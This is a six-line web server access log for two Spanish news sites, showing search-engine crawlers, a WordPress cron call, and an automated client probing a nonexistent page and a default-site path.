3.224.220.0 - - [02/Feb/2024:21:16:43 +0100] "GET /wp-content/uploads/2022/09/fotonoticia_20220904162456_1920-e1662318989660-750x375.jpg HTTP/1.1" 200 41888 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
54.36.148.0 - - [02/Feb/2024:21:19:23 +0100] "GET /opinion/resistencia-paciencia/ HTTP/1.1" 200 158166 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "-"
82.165.88.0 - - [02/Feb/2024:21:19:24 +0100] "POST /wp-cron.php?doing_wp_cron=1706905164.2365789413452148437500 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
184.154.76.0 - - [02/Feb/2024:21:19:44 +0100] "GET / HTTP/1.1" 200 336 www.cronicadesevilla.com "http://www.google.com/url?url=www.cronicadesevilla.com&yahoo.com" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)" "-"
184.154.76.0 - - [02/Feb/2024:21:19:44 +0100] "GET /th1s_1s_a_4o4.html HTTP/1.1" 404 596 www.cronicadesevilla.com "http://www.google.com/url?url=www.cronicadesevilla.com&yahoo.com" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)" "-"
184.154.76.0 - - [02/Feb/2024:21:19:45 +0100] "GET /defaultsite HTTP/1.1" 200 18994 www.cronicadesevilla.com "http://www.google.com/url?url=www.cronicadesevilla.com&yahoo.com" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)" "-"
